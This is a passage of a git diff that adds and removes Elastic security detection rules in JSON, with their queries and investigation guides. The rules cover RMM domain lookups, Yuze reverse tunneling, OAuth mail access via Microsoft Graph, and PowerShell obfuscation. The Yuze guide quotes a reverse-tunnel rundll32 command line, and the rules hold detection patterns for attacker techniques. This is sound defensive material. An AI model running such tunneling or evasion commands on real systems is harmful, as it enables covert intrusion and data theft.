`metrics-system.cpu-*`\n- `metrics-system.load-*` (if enabled)\n\nFor more details on the System integration and available metrics, refer to the documentation:\nhttps://docs.elastic.co/integrations/system\n", + "severity": "high", + "tags": [ + "Use Case: Threat Detection", + "Rule Type: Higher-Order Rule", + "Resources: Investigation Guide", + "Domain: Endpoint", + "Tactic: Impact" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 4 + }, + "id": "df9c0e92-5dee-4f1d-a760-3a5c039e4382_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e2dc8f8c-5f16-42fa-b49e-0eb8057f7444_4.json b/packages/security_detection_engine/kibana/security_rule/e2dc8f8c-5f16-42fa-b49e-0eb8057f7444_4.json deleted file mode 100644 index 98d3ba8d45c..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/e2dc8f8c-5f16-42fa-b49e-0eb8057f7444_4.json +++ /dev/null @@ -1,84 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "building_block_type": "default", - "description": "Adversaries may attempt to get a listing of network connections to or from a compromised system.", - "from": "now-119m", - "index": [ - "logs-endpoint.events.*", - "endgame-*", - "auditbeat-*", - "logs-auditd_manager.auditd-*" - ], - "interval": "60m", - "language": "eql", - "license": "Elastic License v2", - "name": "System Network Connections Discovery", - "query": "process where event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and\nprocess.name in (\"netstat\", \"lsof\", \"who\", \"w\")\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^9.0.0" - }, - { - "package": "auditd_manager", - "version": "^1.18.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "e2dc8f8c-5f16-42fa-b49e-0eb8057f7444", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Rule Type: BBR", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Auditd Manager" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0007", - "name": "Discovery", - "reference": "https://attack.mitre.org/tactics/TA0007/" - }, - "technique": [ - { - "id": "T1049", - "name": "System Network Connections Discovery", - "reference": "https://attack.mitre.org/techniques/T1049/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 4 - }, - "id": "e2dc8f8c-5f16-42fa-b49e-0eb8057f7444_4", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e5f6a7b8-c9d0-8e1f-2a3b-4c5d6e7f8a9b_3.json b/packages/security_detection_engine/kibana/security_rule/e5f6a7b8-c9d0-8e1f-2a3b-4c5d6e7f8a9b_3.json new file mode 100644 index 00000000000..b6115668173 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e5f6a7b8-c9d0-8e1f-2a3b-4c5d6e7f8a9b_3.json @@ -0,0 +1,117 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects DNS queries to commonly abused remote monitoring and management (RMM) or remote access software domains from processes that are not browsers. Intended to surface RMM clients, scripts, or other non-browser activity contacting these services.", + "from": "now-7205m", + "interval": "5m", + "language": "esql", + "license": "Elastic License v2", + "name": "First Time Seen DNS Query to RMM Domain", + "note": "## Triage and analysis\n\n### Investigating First Time Seen DNS Query to RMM Domain\n\nThis rule flags DNS queries to commonly abused RMM or remote access domains when the requesting process is not a browser. Legitimate RMM and remote desktop software is frequently abused for C2, persistence, and lateral movement.\n\n### Possible investigation steps\n\n- Identify the process process.executable that performed the DNS query and verify if it is an approved RMM or remote access tool.\n- Review the full process tree and parent process to understand how the binary was launched.\n- Check process.code_signature for trusted RMM publishers; unsigned or unexpected signers may indicate abuse or trojanized installers.\n- Correlate with the companion rule \"First Time Seen Remote Monitoring and Management Tool\" for the same host to see if the RMM process was first-time seen.\n- Investigate other alerts for the same host or user in the past 48 hours.\n\n### False positive analysis\n\n- Approved RMM or remote support tools used by IT will trigger this rule; consider allowlisting by process path or code signer for known managed tools.\n- Some updaters or installers (e.g. signed by the RMM vendor) may resolve these domains; combine with process name or parent context to reduce noise.\n\n### Response and remediation\n\n- If unauthorized RMM use is confirmed: isolate the host, remove the RMM software, rotate credentials, and block the domains at DNS/firewall where policy permits.\n- Enforce policy that only approved RMM tools from approved publishers may be used, and only by authorized staff.\n", + "query": "FROM logs-endpoint.events.network-*, logs-windows.sysmon_operational-* METADATA _index\n| WHERE host.os.type == \"windows\"\n AND event.category == \"network\"\n AND event.action in (\"lookup_requested\", \"DNSEvent (DNS query)\")\n AND dns.question.name IS NOT NULL\n\n// Exclude browser processes\n| WHERE NOT\n process.name IN (\n \"chrome.exe\", \"msedge.exe\", \"MicrosoftEdge.exe\", \"MicrosoftEdgeCP.exe\",\n \"firefox.exe\", \"iexplore.exe\", \"safari.exe\", \"brave.exe\",\n \"opera.exe\", \"vivaldi.exe\", \"msedgewebview2.exe\"\n )\n\n// Extract the parent domain (last two labels, e.g. example.com)\n| GROK dns.question.name \"\"\"(?:[^.]+\\.)+(?[^.]+\\.[^.]+)$\"\"\"\n| EVAL parent_domain = COALESCE(parent_domain, dns.question.name)\n\n// Known RMM parent domains, add or remove entries here as your environment changes.\n| WHERE parent_domain IN (\n \"teamviewer.com\",\n \"logmein.com\",\n \"logmeinrescue.com\",\n \"logmeininc.com\",\n \"internapcdn.net\",\n \"anydesk.com\",\n \"screenconnect.com\",\n \"connectwise.com\",\n \"splashtop.com\",\n \"zohoassist.com\",\n \"dwservice.net\",\n \"gotoassist.com\",\n \"getgo.com\",\n \"logmeinrescue.com\",\n \"rustdesk.com\",\n \"remoteutilities.com\",\n \"atera.com\",\n \"ammyy.com\",\n \"n-able.com\",\n \"kaseya.net\",\n \"bomgar.com\",\n \"beyondtrustcloud.com\",\n \"parsec.app\",\n \"parsecusercontent.com\",\n \"tailscale.com\",\n \"twingate.com\",\n \"jumpcloud.com\",\n \"vnc.com\",\n \"remotepc.com\",\n \"netsupportsoftware.com\",\n \"getscreen.me\",\n \"beanywhere.com\",\n \"swi-rc.com\",\n \"swi-tc.com\",\n \"qetqo.com\",\n \"tmate.io\",\n \"playanext.com\",\n \"supremocontrol.com\",\n \"itarian.com\",\n \"datto.com\",\n \"auvik.com\",\n \"syncromsp.com\",\n \"pulseway.com\",\n \"immy.bot\",\n \"immybot.com\",\n \"level.io\",\n \"ninjarmm.com\",\n \"ninjaone.com\",\n \"centrastage.net\",\n \"datto.net\",\n \"liongard.com\",\n \"naverisk.com\",\n \"panorama9.com\",\n \"superops.ai\",\n \"superops.com\",\n \"tacticalrmm.com\",\n \"meshcentral.com\",\n \"remotly.com\",\n \"fixme.it\",\n \"islonline.com\",\n \"zoho.eu\",\n \"goverlan.com\",\n \"iperius.net\",\n \"iperiusremote.com\",\n \"remotix.com\",\n \"mikogo.com\",\n \"r-hud.net\",\n \"pcvisit.de\",\n \"netviewer.com\",\n \"helpwire.app\",\n \"remotetopc.com\",\n \"rport.io\",\n \"action1.com\",\n \"tiflux.com\",\n \"gotoresolve.com\"\n)\n\n// Aggregate by parent domain and get 1st time seen timestamp as well as unique count of agents\n| STATS\n event_count = COUNT(*),\n Esql.first_time_seen = MIN(@timestamp),\n Esql.count_distinct_host_id = COUNT_DISTINCT(host.id),\n Esql.process_executable_values = VALUES(process.executable),\n Esql.dns_question_name_values = VALUES(dns.question.name),\n Esql.host_name_values = VALUES(host.name) BY parent_domain\n\n// Calculate the time difference between first time seen and rule execution time\n| eval Esql.recent = DATE_DIFF(\"minute\", Esql.first_time_seen, now())\n\n// First time seen is within 6m of the rule execution time and first seen in the last 5 days as per the rule from schedule and limited to 1 unique host\n| where Esql.recent <= 6 and Esql.count_distinct_host_id == 1\n\n// populate fields for rule exception\n| eval host.name = MV_FIRST(Esql.host_name_values),\n process.executable = MV_FIRST(Esql.process_executable_values), dns.question.name = MV_FIRST(Esql.dns_question_name_values)\n| keep host.name, process.executable, dns.question.name, Esql.*\n", + "references": [ + "https://attack.mitre.org/techniques/T1219/002/", + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-025a" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.count_distinct_host_id", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.dns_question_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.first_time_seen", + "type": "date" + }, + { + "ecs": false, + "name": "Esql.host_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.process_executable_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.recent", + "type": "integer" + }, + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e5f6a7b8-c9d0-8e1f-2a3b-4c5d6e7f8a9b", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1219", + "name": "Remote Access Tools", + "reference": "https://attack.mitre.org/techniques/T1219/", + "subtechnique": [ + { + "id": "T1219.002", + "name": "Remote Desktop Software", + "reference": "https://attack.mitre.org/techniques/T1219/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 3 + }, + "id": "e5f6a7b8-c9d0-8e1f-2a3b-4c5d6e7f8a9b_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e7f2c4a1-9b3d-5e8f-c6a0-2d1b4e7f8c3a_1.json b/packages/security_detection_engine/kibana/security_rule/e7f2c4a1-9b3d-5e8f-c6a0-2d1b4e7f8c3a_1.json new file mode 100644 index 00000000000..2236da9cf0c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e7f2c4a1-9b3d-5e8f-c6a0-2d1b4e7f8c3a_1.json @@ -0,0 +1,121 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies execution of Yuze, a lightweight open-source tunneling tool used for intranet penetration. Yuze supports forward and reverse SOCKS5 proxy tunneling and is typically executed via rundll32 loading yuze.dll with the RunYuze export. Threat actors may use it to proxy C2 or pivot traffic.", + "from": "now-9m", + "index": [ + "endgame-*", + "logs-crowdstrike.fdr*", + "logs-endpoint.events.process-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*", + "logs-system.security*", + "logs-windows.sysmon_operational-*", + "winlogbeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Protocol Tunneling via Yuze", + "note": "## Triage and analysis\n\n### Investigating Potential Protocol Tunneling via Yuze\n\nYuze is a C-based tunneling tool used for intranet penetration and supports forward and reverse SOCKS5 proxy tunneling. It is commonly executed as `rundll32 yuze.dll,RunYuze reverse -c :` and has been observed in threat actor campaigns.\n\n### Possible investigation steps\n\n- Confirm the command line contains `yuze.dll` and `RunYuze`; typical form is `rundll32 yuze.dll,RunYuze reverse -c :`.\n- Extract the remote endpoint from the `-c` argument (C2 or relay) and look up the IP/domain in threat intelligence.\n- Locate where yuze.dll was loaded from; check file creation time to see if it was recently dropped.\n- Identify the parent process that started rundll32 (script, scheduled task, exploit, etc.) to understand the execution chain.\n- Correlate with network events for outbound connections from this host to the IP/port in the command line.\n\n### False positive analysis\n\n- Legitimate use of Yuze is rare; most hits are likely malicious or red-team. If you use Yuze for authorized testing, consider an exception by host or user.\n\n### Response and remediation\n\n- Isolate the host and terminate the rundll32 process.\n- Remove yuze.dll from disk and hunt for other copies or related artifacts.\n- Block the C2/relay IP or domain at DNS/firewall; rotate credentials if the tunnel was used for access.\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n ( \n (process.args : \"reverse\" and process.args : (\"-c\", \"-s\")) or \n (process.args : (\"proxy\", \"fwd\") and process.args : \"-l\") \n ) and \n (?process.code_signature.exists == false or process.name : \"rundll32.exe\")\n", + "references": [ + "https://attack.mitre.org/techniques/T1572/", + "https://github.com/P001water/yuze", + "https://www.trendmicro.com/tr_tr/research/26/c/dissecting-a-warlock-attack.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "system", + "version": "^2.0.0" + }, + { + "package": "crowdstrike", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.exists", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e7f2c4a1-9b3d-5e8f-c6a0-2d1b4e7f8c3a", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Crowdstrike", + "Data Source: Elastic Endgame", + "Data Source: Windows Security Event Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "e7f2c4a1-9b3d-5e8f-c6a0-2d1b4e7f8c3a_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e882e934-2aaa-11f0-8272-f661ea17fbcc_4.json b/packages/security_detection_engine/kibana/security_rule/e882e934-2aaa-11f0-8272-f661ea17fbcc_4.json new file mode 100644 index 00000000000..a5f52664cdb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e882e934-2aaa-11f0-8272-f661ea17fbcc_4.json @@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies access to email resources via Microsoft Graph API using an first-party application on behalf of a user principal. This behavior may indicate an adversary using a phished OAuth refresh token or a Primary Refresh Token (PRT) to access email resources. The pattern includes requests to Microsoft Graph API endpoints related to email, such as /me/mailFolders/inbox/messages or /users/{user_id}/messages, using a public client application ID and a user principal object ID. This is a New Terms rule that only signals if the application ID and user principal object ID have not been seen doing this activity in the last 14 days.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-azure.graphactivitylogs-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft Graph Request Email Access by Unusual User and Client", + "new_terms_fields": [ + "azure.graphactivitylogs.properties.app_id", + "azure.graphactivitylogs.properties.user_principal_object_id" + ], + "note": "## Triage and analysis\n\n### Investigating Microsoft Graph Request Email Access by Unusual User and Client\n\nThis rule detects instances where a previously unseen or rare Microsoft Graph application client ID accesses email-related APIs, such as `/me/messages`, `/sendMail`, or `/mailFolders/inbox/messages`. These accesses are performed via delegated user credentials using common OAuth scopes like `Mail.Read`, `Mail.ReadWrite`, `Mail.Send`, or `email`. This activity may indicate unauthorized use of a newly consented or compromised application to read or exfiltrate mail content. This is a New Terms rule that only signals if the application ID (`azure.graphactivitylogs.properties.app_id`) and user principal object ID (`azure.graphactivitylogs.properties.user_principal_object_id`) have not been seen doing this activity in the last 14 days.\n\n### Possible Investigation Steps:\n\n- `azure.graphactivitylogs.properties.app_id`: Investigate the application ID involved. Is it known and sanctioned in your tenant? Pivot to Azure Portal \u2192 Enterprise Applications \u2192 Search by App ID to determine app details, publisher, and consent status.\n- `azure.graphactivitylogs.properties.scopes`: Review the scopes requested by the application. Email-related scopes such as `Mail.ReadWrite` and `Mail.Send` are especially sensitive and suggest the app is interacting with mail content.\n- `url.path` / `azure.graphactivitylogs.properties.requestUri`: Determine exactly which mail-related APIs were accessed (e.g., reading inbox, sending messages, enumerating folders).\n- `user.id`: Identify the user whose credentials were used. Determine if the user recently consented to a new app, clicked a phishing link, or reported suspicious activity.\n- `user_agent.original`: Check for suspicious automation tools (e.g., `python-requests`, `curl`, non-browser agents), which may suggest scripted access.\n- `source.ip` and `client.geo`: Investigate the source IP and geography. Look for unusual access from unexpected countries, VPS providers, or anonymizing services.\n- `http.request.method`: Determine intent based on HTTP method \u2014 `GET` (reading), `POST` (sending), `PATCH`/`DELETE` (modifying/removing messages).\n- `token_issued_at` and `@timestamp`: Determine how long the token has been active and whether access is ongoing or recent.\n- `azure.graphactivitylogs.properties.c_sid`: Use the session correlation ID to identify other related activity in the same session. This may help identify if the app is accessing multiple users' mailboxes or if the same user is accessing multiple apps.\n- Correlate with Microsoft Entra ID (`azure.auditlogs` and `azure.signinlogs`) to determine whether:\n - The app was recently granted admin or user consent\n - Risky sign-ins occurred just prior to or after mail access\n - The same IP or app ID appears across multiple users\n\n### False Positive Analysis\n\n- New legitimate apps may appear after a user consents via OAuth. Developers, third-party tools, or IT-supplied utilities may access mail APIs if users consent.\n- Users leveraging Microsoft development environments (e.g., Visual Studio Code) may trigger this behavior with delegated `.default` permissions.\n- Admin-approved apps deployed via conditional access may trigger similar access logs if not previously seen in detection baselines.\n\n### Response and Remediation\n\n- If access is unauthorized or unexpected:\n - Revoke the app's consent in Azure AD via the Enterprise Applications blade.\n - Revoke user refresh tokens via Microsoft Entra or PowerShell.\n - Investigate the user's session and alert them to possible phishing or OAuth consent abuse.\n- Review and restrict risky OAuth permissions in Conditional Access and App Governance policies.\n- Add known, trusted app IDs to a detection allowlist to reduce noise in the future.\n- Continue monitoring the app ID for additional usage across the tenant or from suspicious IPs.\n", + "query": "event.dataset:azure.graphactivitylogs\n and azure.graphactivitylogs.properties.app_id:*\n and azure.graphactivitylogs.result_signature:200\n and azure.graphactivitylogs.properties.c_idtyp:user\n and azure.graphactivitylogs.properties.client_auth_method:0\n and http.request.method:(DELETE or GET or PATCH or POST or PUT)\n and (\n (\n url.path:(/v1.0/me/*cc or /v1.0/users/*)\n and (\n url.path:((*inbox* or *mail* or *messages*) and not *mailboxSettings*)\n or azure.graphactivitylogs.properties.requestUri:(*inbox* or *mail* or *messages*)\n )\n )\n or azure.graphactivitylogs.properties.scopes:(Mail.Read or Mail.ReadWrite or Mail.Send)\n )\n", + "references": [ + "https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/", + "https://github.com/dirkjanm/ROADtools", + "https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/", + "https://pushsecurity.com/blog/consentfix" + ], + "related_integrations": [ + { + "package": "azure", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.graphactivitylogs.properties.app_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.graphactivitylogs.properties.c_idtyp", + "type": "unknown" + }, + { + "ecs": false, + "name": "azure.graphactivitylogs.properties.client_auth_method", + "type": "integer" + }, + { + "ecs": false, + "name": "azure.graphactivitylogs.properties.requestUri", + "type": "unknown" + }, + { + "ecs": false, + "name": "azure.graphactivitylogs.properties.scopes", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.graphactivitylogs.result_signature", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "http.request.method", + "type": "keyword" + }, + { + "ecs": true, + "name": "url.path", + "type": "wildcard" + } + ], + "risk_score": 47, + "rule_id": "e882e934-2aaa-11f0-8272-f661ea17fbcc", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Domain: Email", + "Data Source: Azure", + "Data Source: Microsoft Graph", + "Data Source: Microsoft Graph Activity Logs", + "Use Case: Threat Detection", + "Tactic: Collection", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1114", + "name": "Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 4 + }, + "id": "e882e934-2aaa-11f0-8272-f661ea17fbcc_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e903ce9a-5ce6-4246-bb14-75ed3ec2edf5_9.json b/packages/security_detection_engine/kibana/security_rule/e903ce9a-5ce6-4246-bb14-75ed3ec2edf5_9.json deleted file mode 100644 index 32c6178d12e..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/e903ce9a-5ce6-4246-bb14-75ed3ec2edf5_9.json +++ /dev/null @@ -1,183 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies PowerShell scripts that use string reordering and runtime reconstruction techniques as a form of obfuscation. These methods are designed to evade static analysis and bypass security protections such as the Antimalware Scan Interface (AMSI).", - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Potential PowerShell Obfuscation via String Reordering", - "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential PowerShell Obfuscation via String Reordering\n\nPowerShell, a powerful scripting language in Windows environments, can be exploited by adversaries using obfuscation techniques like string reordering to evade detection. This involves rearranging strings and reconstructing them at runtime, bypassing static analysis and security measures. The detection rule identifies scripts with excessive length and specific patterns, flagging those with multiple occurrences of string format expressions, which are indicative of obfuscation attempts. By filtering out known benign patterns, it reduces false positives, focusing on genuine threats.\n\n### Possible investigation steps\n\n- Review the script block text by examining the powershell.file.script_block_text field to understand the nature of the obfuscation and identify any potentially malicious commands or patterns.\n- Check the file.path and file.name fields to determine the origin and context of the script, which can provide insights into whether the script is part of a legitimate application or a potential threat.\n- Investigate the host.name and user.id fields to identify the affected system and user, which can help in assessing the potential impact and scope of the incident.\n- Analyze the powershell.file.script_block_id and powershell.sequence fields to trace the execution sequence and history of the script, which may reveal additional suspicious activities or related scripts.\n- Correlate the alert with other security events or logs from the same host or user to identify any patterns or additional indicators of compromise that may suggest a broader attack campaign.\n\n### False positive analysis\n\n- Scripts related to the Icinga Framework may trigger false positives due to their use of string formatting. To handle this, ensure that the file name \"framework_cache.psm1\" is excluded from the detection rule.\n- PowerShell scripts that include specific sentinel patterns, such as \"sentinelbreakpoints\" or paths like \":::::\\windows\\sentinel\", combined with variables like \"$local:Bypassed\" or \"origPSExecutionPolicyPreference\", are known to be benign. These should be excluded to reduce noise.\n- Regularly review and update the exclusion list to include any new benign patterns that are identified over time, ensuring the rule remains effective without generating unnecessary alerts.\n- Consider implementing a whitelist of known safe scripts or script authors to further minimize false positives, especially in environments with frequent legitimate use of complex PowerShell scripts.\n\n### Response and remediation\n\n- Isolate the affected system from the network to prevent further spread of potentially malicious scripts.\n- Terminate any suspicious PowerShell processes identified by the alert to stop ongoing malicious activity.\n- Conduct a thorough review of the PowerShell script block text flagged by the alert to understand the intent and potential impact of the obfuscated script.\n- Remove any malicious scripts or files identified during the investigation from the affected system to prevent re-execution.\n- Restore the system from a known good backup if the script has caused significant changes or damage to the system.\n- Update and strengthen endpoint protection measures, ensuring that AMSI and other security tools are fully operational and configured to detect similar obfuscation techniques.\n- Escalate the incident to the security operations center (SOC) or incident response team for further analysis and to determine if additional systems are affected.\n", - "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\" and powershell.file.script_block_text like \"*{0}*\"\n\n// Filter out smaller scripts that are unlikely to implement obfuscation using the patterns we are looking for\n| eval Esql.script_block_length = length(powershell.file.script_block_text)\n| where Esql.script_block_length > 500\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n| eval Esql.script_block_tmp = replace(\n powershell.file.script_block_text,\n \"\"\"((\\{\\d+\\}){2,}[\"']\\s?-f|::Format[^\\{]+(\\{\\d+\\}){2,})\"\"\",\n \"\ud83d\udd25\"\n)\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_pattern_count = length(Esql.script_block_tmp) - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_pattern_count,\n Esql.script_block_length,\n Esql.script_block_tmp,\n powershell.file.*,\n file.path,\n file.directory,\n powershell.sequence,\n powershell.total,\n _id,\n _version,\n _index,\n host.name,\n agent.id,\n user.id\n\n// Filter for scripts that match the pattern at least five times\n| where Esql.script_block_pattern_count >= 5\n\n// Exclude Noisy Patterns\n\n// Icinga Framework\n| where not file.directory == \"C:\\\\Program Files\\\\WindowsPowerShell\\\\Modules\\\\icinga-powershell-framework\\\\cache\"\n // ESQL requires this condition, otherwise it only returns matches where file.directory exists.\n or file.directory IS NULL\n\n| where not (powershell.file.script_block_text LIKE \"*GitBranchStatus*\" AND \n powershell.file.script_block_text LIKE \"*$s.BranchBehindStatusSymbol.Text*\")\n| where not\n // https://wtfbins.wtf/17\n (\n (powershell.file.script_block_text like \"*sentinelbreakpoints*\" or\n powershell.file.script_block_text like \"*:::::\\\\\\\\windows\\\\\\\\sentinel*\")\n and\n (powershell.file.script_block_text like \"*$local:Bypassed*\" or\n powershell.file.script_block_text like \"*origPSExecutionPolicyPreference*\")\n )\n", - "related_integrations": [ - { - "package": "windows", - "version": "^3.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "Esql.script_block_length", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_pattern_count", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_tmp", - "type": "keyword" - }, - { - "ecs": false, - "name": "_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "_index", - "type": "keyword" - }, - { - "ecs": false, - "name": "_version", - "type": "long" - }, - { - "ecs": true, - "name": "agent.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.directory", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.name", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_entropy_bits", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_hash", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_length", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.file.script_block_surprisal_stdev", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_text", - "type": "text" - }, - { - "ecs": false, - "name": "powershell.file.script_block_unique_symbols", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.sequence", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.total", - "type": "long" - }, - { - "ecs": true, - "name": "user.id", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "e903ce9a-5ce6-4246-bb14-75ed3ec2edf5", - "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1027", - "name": "Obfuscated Files or Information", - "reference": "https://attack.mitre.org/techniques/T1027/" - }, - { - "id": "T1140", - "name": "Deobfuscate/Decode Files or Information", - "reference": "https://attack.mitre.org/techniques/T1140/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.001", - "name": "PowerShell", - "reference": "https://attack.mitre.org/techniques/T1059/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 9 - }, - "id": 